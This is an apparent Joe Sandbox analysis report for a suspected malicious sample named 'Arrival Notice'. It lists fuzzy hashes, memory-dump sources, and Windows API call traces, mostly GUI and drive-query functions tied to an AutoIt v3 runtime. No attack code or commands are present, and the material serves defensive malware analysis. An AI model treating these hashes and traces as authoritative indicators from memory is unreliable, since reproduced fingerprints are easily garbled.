                  • Instruction ID: b572910d42651808407805c8b92a36bb7f28e263f5375a1de3ead2dbe366fb3a
                  • Opcode Fuzzy Hash: 69aa0af51c8c20b1b65f5947d71b1fe5956815960c523acc2c36e136eaadc988
                  • Instruction Fuzzy Hash: E622BF70A046099FDF15CF68C881AEEB7F6FF44304F204529EA16EB691EB359D51CB50
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2826f8541ca1ecf1f89a36a1b3de594023758aa7558adf6c699a53bd0facf5a6
                  • Instruction ID: 7103070e430adc6c23cab06b8c7d29bdaf2a485614dd59b52bad80ec093b0625
                  • Opcode Fuzzy Hash: 2826f8541ca1ecf1f89a36a1b3de594023758aa7558adf6c699a53bd0facf5a6
                  • Instruction Fuzzy Hash: F302C4B1E00209EFCB06DF64D881BADB7B5FF44304F118169EA06DB6A1E731AE50CB95
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction ID: 4e9de5705fef9d3000b80ca79ee6b5692efd69806ca102378f6ed66267b87a06
                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction Fuzzy Hash: 769177736090A35BDB6B463AA57403EFFE55A923A131B079FD4F2CB2C5EF208954D620
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction ID: f1a88fe30fb4366e332fc2e20ec562b83f5083b92226679e94e58c4e500b9538
                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction Fuzzy Hash: 299154732090A35BDB2F427AA57403DFFE55A923A131B079FD4F2CA6C5FE24C5649620
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d3c057e4f6e927fb340a80c722c7cdcade73bdbda0f6058c2e9df3009df6d6a5
                  • Instruction ID: 749981ef446c2c7107f74eab73030c075decc8e7ad59b59dd8d2a895e30a8e01
                  • Opcode Fuzzy Hash: d3c057e4f6e927fb340a80c722c7cdcade73bdbda0f6058c2e9df3009df6d6a5
                  • Instruction Fuzzy Hash: 1461587320C74956DA3B9A28BCA6BBE2398EF41700F12091BF843DF781F611EE468355
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 608c17bceaf1cb60a8c1023edfba1d8d0a67e3c0f75baf6f0355445861a0c060
                  • Instruction ID: cd7514fdc2056845ba932351314ad69aa5772c06fe48bf436a2b32bed0670508
                  • Opcode Fuzzy Hash: 608c17bceaf1cb60a8c1023edfba1d8d0a67e3c0f75baf6f0355445861a0c060
                  • Instruction Fuzzy Hash: 1A61AC3360870957DE3B5A28B892BBF639ADF42704F11095BE943CF781FA12ED428355
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction ID: a556fd76a8deb6a78f7b52a77d0f5216e82f952b7dc13ab8dfe6f760b5cad29c
                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction Fuzzy Hash: 458177736080A31BDB6F8279953403EFFE15A923A131B079FD4F2CA6D5EE248554E660
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00432B30
                  • DeleteObject.GDI32(00000000), ref: 00432B43
                  • DestroyWindow.USER32 ref: 00432B52
                  • GetDesktopWindow.USER32 ref: 00432B6D
                  • GetWindowRect.USER32(00000000), ref: 00432B74
                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00432CA3
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00432CB1
                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432CF8
                  • GetClientRect.USER32(00000000,?), ref: 00432D04
                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00432D40
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D62
                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D75
                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D80
                  • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D89
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D98
                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432DA1
                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432DA8
                  • GlobalFree.KERNEL32(00000000), ref: 00432DB3
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432DC5
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0044FC38,00000000), ref: 00432DDB
                  • GlobalFree.KERNEL32(00000000), ref: 00432DEB
                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00432E11
                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00432E30
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432E52
                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043303F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                  • String ID: $AutoIt v3$DISPLAY$static
                  • API String ID: 2211948467-2373415609
                  • Opcode ID: 5bbc20e0ce28699c2a7331374591631541a6328257729e17b81d607ba542554d
                  • Instruction ID: 235bcbd8364cc1206ca40eae6504a7e42609eaf13a68cb059d1aecad754b862b
                  • Opcode Fuzzy Hash: 5bbc20e0ce28699c2a7331374591631541a6328257729e17b81d607ba542554d
                  • Instruction Fuzzy Hash: B4029E75A00204AFDB14DF64CD89EAE7BB9FF49310F148529F915AB2A1CB74AD01CF64
                  APIs
                  • SetTextColor.GDI32(?,00000000), ref: 0044712F
                  • GetSysColorBrush.USER32(0000000F), ref: 00447160
                  • GetSysColor.USER32(0000000F), ref: 0044716C
                  • SetBkColor.GDI32(?,000000FF), ref: 00447186
                  • SelectObject.GDI32(?,?), ref: 00447195
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004471C0
                  • GetSysColor.USER32(00000010), ref: 004471C8
                  • CreateSolidBrush.GDI32(00000000), ref: 004471CF
                  • FrameRect.USER32(?,?,00000000), ref: 004471DE
                  • DeleteObject.GDI32(00000000), ref: 004471E5
                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00447230
                  • FillRect.USER32(?,?,?), ref: 00447262
                  • GetWindowLongW.USER32(?,000000F0), ref: 00447284
                    • Part of subcall function 004473E8: GetSysColor.USER32(00000012), ref: 00447421
                    • Part of subcall function 004473E8: SetTextColor.GDI32(?,?), ref: 00447425
                    • Part of subcall function 004473E8: GetSysColorBrush.USER32(0000000F), ref: 0044743B
                    • Part of subcall function 004473E8: GetSysColor.USER32(0000000F), ref: 00447446
                    • Part of subcall function 004473E8: GetSysColor.USER32(00000011), ref: 00447463
                    • Part of subcall function 004473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00447471
                    • Part of subcall function 004473E8: SelectObject.GDI32(?,00000000), ref: 00447482
                    • Part of subcall function 004473E8: SetBkColor.GDI32(?,00000000), ref: 0044748B
                    • Part of subcall function 004473E8: SelectObject.GDI32(?,?), ref: 00447498
                    • Part of subcall function 004473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004474B7
                    • Part of subcall function 004473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004474CE
                    • Part of subcall function 004473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004474DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                  • String ID:
                  • API String ID: 4124339563-0
                  • Opcode ID: f470876ac78b269bd13a7d40cc7061f6a2623c372def8a086d91bd8633f05a21
                  • Instruction ID: 197a62a55588d8607be3009edb25428b95ff08f93ae5e1914e13e5b63b4958ef
                  • Opcode Fuzzy Hash: f470876ac78b269bd13a7d40cc7061f6a2623c372def8a086d91bd8633f05a21
                  • Instruction Fuzzy Hash: 78A1C176009311BFE7509F60DC88E5BBBA9FB4A321F140A29F962961E1D774E801CF56
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 003C8E14
                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00406AC5
                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00406AFE
                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00406F43
                    • Part of subcall function 003C8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003C8BE8,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 003C8FC5
                  • SendMessageW.USER32(?,00001053), ref: 00406F7F
                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00406F96
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00406FAC
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00406FB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                  • String ID: 0
                  • API String ID: 2760611726-4108050209
                  • Opcode ID: 3feaaa8cbca49b398170aa9d6f03b111c5b6f6eee6c5c592013d4ae94fa89920
                  • Instruction ID: fe660439114e108f033a731512f3c461b6dd2e1b1d1c2047af796608545e23b5
                  • Opcode Fuzzy Hash: 3feaaa8cbca49b398170aa9d6f03b111c5b6f6eee6c5c592013d4ae94fa89920
                  • Instruction Fuzzy Hash: 6512AE742012119FD725CF24C884BAAB7F5FF45300F19447EE486EB6A1CB35AD62CB99
                  APIs
                  • DestroyWindow.USER32(00000000), ref: 0043273E
                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0043286A
                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004328A9
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004328B9
                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00432900
                  • GetClientRect.USER32(00000000,?), ref: 0043290C
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00432955
                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00432964
                  • GetStockObject.GDI32(00000011), ref: 00432974
                  • SelectObject.GDI32(00000000,00000000), ref: 00432978
                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00432988
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00432991
                  • DeleteDC.GDI32(00000000), ref: 0043299A
                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004329C6
                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 004329DD
                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00432A1D
                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00432A31
                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00432A42
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00432A77
                  • GetStockObject.GDI32(00000011), ref: 00432A82
                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00432A8D
                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00432A97
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                  • API String ID: 2910397461-517079104
                  • Opcode ID: b7033b3e00b14b60f070917eb5155bfe81817a67cafb02fd904a6b5c973dfbe5
                  • Instruction ID: 504d55a067e11d3f02e0b4182db9025eda6e5094347bf9d2eed790c5254a03f1
                  • Opcode Fuzzy Hash: b7033b3e00b14b60f070917eb5155bfe81817a67cafb02fd904a6b5c973dfbe5
                  • Instruction Fuzzy Hash: 80B18175A00215AFEB14DF68CD85FAE7BA9FB09710F004525FA15EB2A0D774ED00CBA8
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00424AED
                  • GetDriveTypeW.KERNEL32(?,0044CB68,?,\\.\,0044CC08), ref: 00424BCA
                  • SetErrorMode.KERNEL32(00000000,0044CB68,?,\\.\,0044CC08), ref: 00424D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$DriveType
                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                  • API String ID: 2907320926-4222207086
                  • Opcode ID: d64cde0871c5277d7248475687b16089ffd091f0c2008312b8cebacb6484c072
                  • Instruction ID: 565b38652cbcb761da5c70473ef0e010818b034147e9ada88569efb2be03fc9d
                  • Opcode Fuzzy Hash: d64cde0871c5277d7248475687b16089ffd091f0c2008312b8cebacb6484c072
                  • Instruction Fuzzy Hash: 416165307001159FCB15DF19DA81AE977A1EB80304BB28017F80AAB751CB7DEC42CB5E
                  APIs
                  • GetSysColor.USER32(00000012), ref: 00447421
                  • SetTextColor.GDI32(?,?), ref: 00447425
                  • GetSysColorBrush.USER32(0000000F), ref: 0044743B
                  • GetSysColor.USER32(0000000F), ref: 00447446
                  • CreateSolidBrush.GDI32(?), ref: 0044744B
                  • GetSysColor.USER32(00000011), ref: 00447463
                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00447471
                  • SelectObject.GDI32(?,00000000), ref: 00447482
                  • SetBkColor.GDI32(?,00000000), ref: 0044748B
                  • SelectObject.GDI32(?,?), ref: 00447498
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004474B7
                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004474CE
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004474DB
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044752A
                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00447554
                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00447572
                  • DrawFocusRect.USER32(?,?), ref: 0044757D
                  • GetSysColor.USER32(00000011), ref: 0044758E
                  • SetTextColor.GDI32(?,00000000), ref: 00447596
                  • DrawTextW.USER32(?,004470F5,000000FF,?,00000000), ref: 004475A8
                  • SelectObject.GDI32(?,?), ref: 004475BF
                  • DeleteObject.GDI32(?), ref: 004475CA
                  • SelectObject.GDI32(?,?), ref: 004475D0
                  • DeleteObject.GDI32(?), ref: 004475D5
                  • SetTextColor.GDI32(?,?), ref: 004475DB
                  • SetBkColor.GDI32(?,?), ref: 004475E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                  • String ID:
                  • API String ID: 1996641542-0
                  • Opcode ID: e78924a21c36b6b6b0c44b89b0460bcb6311c9ca4e1f6126f4f78c688db891ff
                  • Instruction ID: c78a67434e0e22f4e2bf7b672100a97ff5f1f13ce23382f091795a2f847cda9b
                  • Opcode Fuzzy Hash: e78924a21c36b6b6b0c44b89b0460bcb6311c9ca4e1f6126f4f78c688db891ff
                  • Instruction Fuzzy Hash: BD619D76901218BFEF019FA4DC88EAEBFB9EB09320F154125F911BB2A1D7749941CF94
                  APIs
                  • GetCursorPos.USER32(?), ref: 00441128
                  • GetDesktopWindow.USER32 ref: 0044113D
                  • GetWindowRect.USER32(00000000), ref: 00441144
                  • GetWindowLongW.USER32(?,000000F0), ref: 00441199
                  • DestroyWindow.USER32(?), ref: 004411B9
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004411ED
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044120B
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044121D
                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00441232
                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00441245
                  • IsWindowVisible.USER32(00000000), ref: 004412A1
                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004412BC
                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004412D0
                  • GetWindowRect.USER32(00000000,?), ref: 004412E8
                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0044130E
                  • GetMonitorInfoW.USER32(00000000,?), ref: 00441328
                  • CopyRect.USER32(?,?), ref: 0044133F
                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 004413AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                  • String ID: ($0$tooltips_class32
                  • API String ID: 698492251-4156429822
                  • Opcode ID: 2c56376c51075ac6bdcf359adf9fdff732fe74c7b07cbb400eafaee04db32cb8
                  • Instruction ID: eb76392ecf012a65cb85c466dba70bbbdf9d1cf3ba8627be02eb9cf2e480ece4
                  • Opcode Fuzzy Hash: 2c56376c51075ac6bdcf359adf9fdff732fe74c7b07cbb400eafaee04db32cb8
                  • Instruction Fuzzy Hash: 3DB19E71604341AFE710DF64C884BABBBE4FF89344F00891EF9999B261CB75E844CB96
                  APIs
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C8968
                  • GetSystemMetrics.USER32(00000007), ref: 003C8970
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C899B
                  • GetSystemMetrics.USER32(00000008), ref: 003C89A3
                  • GetSystemMetrics.USER32(00000004), ref: 003C89C8
                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003C89E5
                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003C89F5
                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003C8A28
                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003C8A3C
                  • GetClientRect.USER32(00000000,000000FF), ref: 003C8A5A
                  • GetStockObject.GDI32(00000011), ref: 003C8A76
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C8A81
                    • Part of subcall function 003C912D: GetCursorPos.USER32(?), ref: 003C9141
                    • Part of subcall function 003C912D: ScreenToClient.USER32(00000000,?), ref: 003C915E
                    • Part of subcall function 003C912D: GetAsyncKeyState.USER32(00000001), ref: 003C9183
                    • Part of subcall function 003C912D: GetAsyncKeyState.USER32(00000002), ref: 003C919D
                  • SetTimer.USER32(00000000,00000000,00000028,003C90FC), ref: 003C8AA8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
